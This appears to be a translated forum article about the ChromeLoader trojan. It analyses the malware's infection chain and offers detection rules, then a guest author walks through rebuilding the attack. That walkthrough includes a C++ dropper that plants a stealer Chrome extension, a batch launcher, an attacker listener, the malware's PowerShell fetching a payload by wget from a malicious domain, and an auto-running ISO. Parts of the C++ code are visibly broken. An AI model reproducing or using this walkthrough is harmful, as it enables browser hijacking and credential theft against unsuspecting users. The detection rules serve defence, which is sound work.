Probably every modern Internet user knows that such a pleasure as "download for free without SMS and registration" can have some consequences. And it's not even that in many countries it is criminally punishable, and not that developers spend years creating something that you will regret 5 conventional units. The problem, in fact, is that it was a "bonus" along with a stolen game, cracked software or a movie as 8K million FPS. One of the many variants of such a gift of fate will be discussed today, its name is ChromeLoader.

The closest to the truth will be its definition as a Trojan virus. It is worth clarifying right away, not from the category of those that will make your computer smoke, spark and decompose. Its most obvious manifestation is that it becomes a browser extension, and then intercepts the user's search queries, transferring traffic to advertising sites. However, the peculiarity is that it uses PowerShell for implementation, which makes it much less visible to security tools. This brings ChromeLoader closer to a credential collector or spyware, because such use of the shell can help other malicious programs gain a foothold in the system and remain unnoticed before doing something more serious. It is also noteworthy that this joy is available not only for Windows, but also for macOS users.

Let's finally see what we have to deal with.

Hm... Some kind of thing from Twitter, a QR code is hidden behind a red square. If we convert this to our segment, we get something like this:

It's primitive to the point of pain, but someone is being led... After downloading and running the installer , the file with the extension .The ISO is extracted and installed as a disk on the victim's device. Inside is a file used to install ChromeLoader as an extension, as well as something similar to a shell.NET for Windows Task Scheduler. Thus, the virus retains its presence on the victim's PC. In the screenshot below, VirusTotal showed exactly which files the malicious ISO dropped:

CS_Installer.exe creates persistence through a scheduled task using svchost.exe . It is also noteworthy that ChromeLoader does not call the Windows Task Scheduler (schtasks.exe ) to add this task, as one would expect, and simply loads the Task scheduler COM API by embedding between other processes. For visualization - implementation in svchost.exe shown below.

This interweaving with other processes is often used by ordinary applications, this is not nonsense. But it is suspicious that the source process is located on a virtual disk. To notice something is wrong, it is important to be able to monitor the processes, where they come from and what program they are created by. Initially, the path of the executable file does not affect the C drive:\, but initiates the interweaving of some processes related specifically to it. Such oddities are characteristic not only of Chromeloader, but also of many other worms that climb from removable disks into C:\drive processes such as explorer.exe , for distribution on the victim's car. After the implementation is completed, the scheduled task will be executed via svchost, calls the command interpreter (cmd.exe ), which executes a Base64-encoded PowerShell command containing several variables. ChromeLoader uses the shortened -encodedcommand flag to encode its command:

A person who is about to download a crack of the full Microsoft Office package from a link from a post on Twitter probably did not dream of all these letters and scary symbols. If we put the jokes aside, then here is an embellished and simplified version of this PowerShell CLI from the Reddit user "Russianh4ck3r".

In this command, the shell checks whether the ChromeLoader extension is installed. If the specific path to the file is not found, it will extract the archive file from a remote location using wget and load the contents as a chrome extension. As soon as it is found, this command will automatically delete the scheduled ChromeLoader task using the Unregister-ScheduledTask function. Then the malware loads its extension into the browser to turn into Chrome with the --load-extension flag and refers to the path to the file of the extension downloaded not so long ago.

That's all. Now our virus has taken its place, and is starting to implement its functions, namely: redirect search results through malicious domains, as well as redirect the user from the chrome extensions page if he suddenly tries to delete it.

And now a quick review of the Mac version. As for the method of infection, the mechanism of catching freeloaders has remained, the difference is in the names of what is being introduced and where. There is no longer a single chrome, there is an opportunity to infect even the Safari browser. For Windows, we had an ISO, here is a file with the DMG extension. And unlike the Windows version, the DMG file contains an installation script that resets payloads for browsers, not a portable executable. When opened, the installation script then initiates cURL to extract the ZIP file containing the malicious browser extension and unzips it into a directory, finally launching Chrome with command line options to download. For consistency, the virus will add the settings file ( ) /Library/LaunchAgents to the plist directory. This guarantees the continuous execution of the ChromeLoader Bash script.

Now to the methods of detecting all the good described above. Not all coded PowerShell is malicious, but coded commands are worth watching out for. Suspicions may cause:

1. PowerShell containing a shortened version of the encodedCommand flag in its command line

Code:

process_name == powershell.exe
&&
command_line_includes (-e, -en, -enc, [goes sequentially to the full flag, -encodedcommand])


2. Generated by PowerShell chrome.exe containing the load-extension command line and AppData\Local inside it as a parameter

Code:

parent_process_name == powershell.exe
&&
process_name == chrome.exe
&&
command_line_includes ( AppData\Local, load-extension)


3. Shell loading the Chrome extension on the command line

Code:

parent_process_equals_any (sh || bash)
&&
process_name_is_osx?
&&
command_line_includes ( /tmp/|| load-extension|| chrome)


4. Base64-encoded commands are redirected to the Shell process



Code:

command_line_includes ( echo, base64)
&&
child proc_equals_any (sh, bash, zsh)

(Points 3 and 4 are for cases on macOS).

Some guy will share practical information and nuances in the implementation of such an attack

Yo, guys, it's @DeathDay with you now. Unexpected, right? I got into someone else's article again, but let them. And now we will conduct a practical test in which we will try to build a full-fledged attack using exclusively the payload of the malware itself and using Powershell. So that you can clearly see how simple the implementation of all this is.

If someone did not understand, then the payload is not acting here at all.exe file, but just the same Chrome extension, which by very clever manipulations is installed in my favorite (no need to spit in my direction) browser.

So, I have two ideas on how to organize such a thing. The first option is the most harmless and simple, and as you know, uncomplicated ideas often work much better than plans for four paper sheets. And the second one will already look more like the original.

It was with great difficulty that I managed to find the extension itself, deciding to see what was so unusual about it, I was disappointed. It is painfully simple, but consists of two parts: server and so-called stiller.

So let's get started. What if you miss this difficult part with the Overlay and immediately go to the extract in the right place - in the chrome extensions storage folder. To cover up this case… Oh, I've got it. If a person knows for sure that he is pumping a crack, then by simple suggestion, they say, you also need to install an alleged “pill”, then he will do it. Are you in doubt? And Kolyan from the fourth grade B did exactly that.

Hehe, it means, we will create a simple extractor, well, like for the sake of appearance and .bat file with startup and upload parameters to the desired directory where the extensions are located:

Code:

%%userprofile%\AppData\Local Google\Chrome\User Data\Default\Extensions

It appears we are writing an archiver in C, why not python? Because I am not Johan Van and I do not fumble in this language.



We start by importing the libraries necessary for our miracle to work:

Code:

include <iostream>
include <string>
include <vector>
include <clocale>


Standard. But to simplify and shorten the code, we will use STD, we will also use the standard namespace:

Code:

using namespace std


Then we will insert the information that the script will require and output:

Code:

<size_of_string>||<filesize>||<filename>||<filesize>||<filename>|| ... ||<end_of_info>||


We will have only one class, let's call it PetyaTorrentCracker228SuperVzlom.iso.torrent.zip.exe .bat in the abbreviated version is Patcher.



It will look like this, explanations in the code are attached:

Code:

class Patcher{



private:

    vector<string> files; // set of files (-files)

    string path; // path (-path)

    string real_bin_file; // name of the output archive file (used for archiving )

public:

    Zipper(vector<string> &vec, string p)

    {

          if(vec.size()>0) files.assign(vec.begin(),vec.end());

          path = p+"\";

          real_bin_file=path+"binary.patcher";

        }



        }

    void getInfo(); // Method for getting information about files at the archiving stage

    void InCompress(); // Data archiving

    void OutCompress(string binary); // Unpacking data ( binary is the path to the archive )



    // Static method for extracting the file name from the full path.

    // Used for internal needs.

    static string get_file_name(string fn){return fn.substr(fn.find_last_of("\")+1,fn.size());}

};


Now we are implementing the method of unarchiving and unarchiving:

Code:

void Patcher::OutCompress(string binary)

{

    FILE *bin = fopen(binary.c_str(),"rb"); // opening the archive in read mode

    char info_block_size[5]; // size of the information block

    fread(info_block_size,1,5,bin); // get the size

    int _sz = atoi(info_block_size); // convert the buffer to a number



    char *info_block = new char[_sz]; // information block

    fread(info_block,1,_sz,bin); // reading it



    // Information block parsing :

    vector<string> tokens;

    char *tok = strtok(info_block,"||");

    int toks = 0;

    while(tok)

    {

        if(strlen(tok)==0) break;

        tokens.push_back(tok);

        tok=strtok(NULL,"||");

        toks++;

    }



    if(toks%2==1) toks--; // deleting garbage

    int files=toks/2; // number of detected files in the archive



    char byte[1]; // single buffer for reading one byte



    // The process of unpacking all files (according to the rules obtained from the information block ) :

    for(int i=0;i<files;i++)

    {

        const char* size = tokens[i*2].c_str();

        const char* name = tokens[i*2+1].c_str();

        char full_path[255];

        strcpy(full_path,this->path.c_str());

        strcat(full_path,name);

        int _sz = atoi(size);

        cout<<"--'"<<name<<"' extracted in '"<<this->path<<"' ."<<endl;

        FILE *curr = fopen(full_path,"wb");

        for(int r=1;r<=_sz;r++)

        {

            if(fread(byte,1,1,bin)==1) fwrite(byte,1,1,curr);

        }

        fclose(curr);



        delete [] size;

        delete [] name;

    }

    fclose(bin);



}



void patcher::InCompress()

{

    char byte[1]; // single buffer for reading one byte



    getInfo(); // get the necessary information about what we archive



    FILE *f;

    FILE *main=fopen((this->real_bin_file).c_str(),"wb"); // archive file

    FILE *info = fopen((this->path+"info.txt").c_str(),"rb"); // file with information



    // rewriting the information to the archive

    while(!feof(info))

    {

        if(fread(byte,1,1,info)==1) fwrite(byte,1,1,main);

        }



        fclose(info);

        remove((this->path+"info.txt").c_str()); // cleaning up after ourselves



    // sequential archiving of archived files by byte :

    for(vector<string>::iterator itr=this->files.begin();itr!=this->files.end();++itr)

    {

        f = fopen((*itr).c_str(),"rb");

        if(!f){ cout<<*itr<<"not found!"<<endl; break;}

        while(!feof(f))

        {

            if(fread(byte,1,1,f)==1) fwrite(byte,1,1,main);

        }

        cout<<*itr<<" added to archive '"<<this->real_bin_file<<"'."<<endl;

        fclose(f);

    }

    fclose(main);

}


And now we are implementing support for the very four initial parameters, this is done easily:

Code:

int main(int argv, char* argc[])

{

    /*/  Supported args:

    //

    //    -pack, -unpack, -files, -path

    //

    /*/



    setlocale(LC_ALL,"UzBeckHacker");

    cout<<endl<<"#########UzBEEKHacked############ Patcher2 ########################"<<endl<<endl;

    if(argv>1)

    {

        vector<string> files; // array of files passed via parameters from the console

        string path = ""; // path

        bool flag_fs = false, flag_path = false; // read/write mode flags

        char type[6]; // type: packing or unpacking

        memset(type,0,6);



        for(int i=1;i<argv;i++)

        {

            if(strcmp(argc[i],"-pack")==0) { strcpy(type,"pack"); flag_fs=flag_path=false;}

            if(strcmp(argc[i],"-unpack")==0) { strcpy(type,"unpack"); flag_fs=flag_path=false;}

            if(strcmp(argc[i],"-path")==0) {flag_path=true; flag_fs=false; continue; }

            if(strcmp(argc[i],"-files")==0) {flag_fs=true; flag_path=false; continue; }



            if(flag_path) {path.assign(argc[i]); }

            if(flag_fs) files.push_back(string(argc[i]));



        }

        Patcher *zip = new Patcher(files,path);

        if(strcmp(type,"pack")==0) zip->InCompress();

        if(strcmp(type,"unpack")==0) zip->OutCompress(files[0]);

    }

    else cout<<"The -pack/-unpack , -files, -path parameters are required!"<<endl;

    cout<<endl<<"########################################################"<<endl<<endl;



}

Compile and... that's it. Let's take our malicious extension, first changing the string to the IP address of our virtual machine:

Code:

const url = `${98.123.43.52}/u`;


And we pack it with our archiver, so that the archive extension is .patcher (like an incomprehensible file for a patch, who would think it's an archive?):

Code:

patcher -pack  -files /C/Kirin/Desktop/background.js -path /C/Kirin/Desktop/Patch


Now you need to write a bat file that will extract the file to the desired directory, its contents will be as follows:

Code:

@echo off
start patcher.exe  -unpack -files patch.patcher -path %userprofile%\AppData\LocalGoogle\Chrome\User Data\Default\Extensions


It's in the hat. We call it something and we can test it. Open the folder with chrome extensions, then run the batnik. The results are pretty good, a script appears in the target directory.JS, which is a browser application. Open chrome and notice that one extension is available and works.



Now let's deal with the listener, here as a finger on the asphalt:

Code:

pip3 install flask rich
flask rich 666


Now we have listening to port 666 working, actually that's it with the first method.





The second one will be based on information about ChroMloader attacks. Since we managed to get a Powershell script that did most of the dirty work, it won't be a big problem.



First, let's analyze the existing code:

Code:

$extPath = "$($env:LOCALAPPDATA)\chrome"
$confPath = "$extPath\conf.js"
$archiveName = "$($env:LOCALAPPDATA)\archive.zip"
$taskName = "ChromeLoader"
$domain = "brokenna.work"




From this we can see what the name of the process should be, of course, it is optional in our case and it will need to be replaced. So, what's even more interesting, the name of the stiller extension itself should be conf.js. The most important line is this one, which is responsible for downloading the archive itself with the payload:

Code:

wget "https://$domain/archive.zip" -outfile "$archiveName"


And here, after all, you can cram everything that your heart desires, and if you also redo the script for yourself, then ... Well, you understand. This will be a very good help for future articles.



So, first we edit the PV script. Rename the process name to Uzbek, why Uzbek? It's just, they're cool.



In terms of wget, you can do a little: how to upload to some public file sharing service, or use ngrok or your apache server. I prefer the most recent option, that's why we'll do it.:

Code:

service apache2 start


We will put the archive with our malicious extension in the Apache folder, since we will conduct tests on the local network, there is no sense to output the connection to the general network. Quickly change the link in wget:

Code:

wget "http://192.168.42.1/uzbek.zip" -outfile "archivemadebyUzbek"


Now our malicious code needs to be turned into an executable file, well, to make everything look beautiful, so we save it in the uzbek.ps1 format, and then dancing with a tambourine begins.



We open the powershell console, where we install the ps2exe module and convert the PSU into an Ehelka:

Code:

Install-Module ps2exe
Invoke-ps2exe .\uzbek.ps1 .\kazach.exe

That's how the Uzbek re-qualified as a Kazakh.

So, then we will pack the malware into .iso, for this I had at hand, quite randomly, the isoworkshop program, which is quite capable of coping with the task. I don't know what to do at all, so I'm going to Google for now.

Aha, you need to create a boot image, this is done by trial, error and random clicks, the main thing is a tick next to the “run instant” item, which will immediately launch if the disk is opened kazach.exe , and that in turn will start dropping malicious files. We save the ISO and go to test.

Opening a malicious image on a virtual machine. I will immediately note with a minus that I have not figured out how to make the contents on the disk impossible to view, but this does not play a special role.

There is a new disk, a certain uzbek is listed in the processes, and a malware appears in the extensions folder. Something like that. That's it for me, I pass the baton to the author.

Result​
Once again, the quote of Confucius was confirmed: "Only birds sing for nothing." Well... be careful on the Internet, drink water, wash your hands with soap. Thanks for your attention 

D: The author turned out to be very laconic, I will add that this virus can be easily deceived if your system is on some disk D or with a custom name, like mine. The very manifestation of Chromeloader does not pose a threat of a critical level, but if someone takes it into their head to modify it and add destructive potential, perhaps this will become a new meta.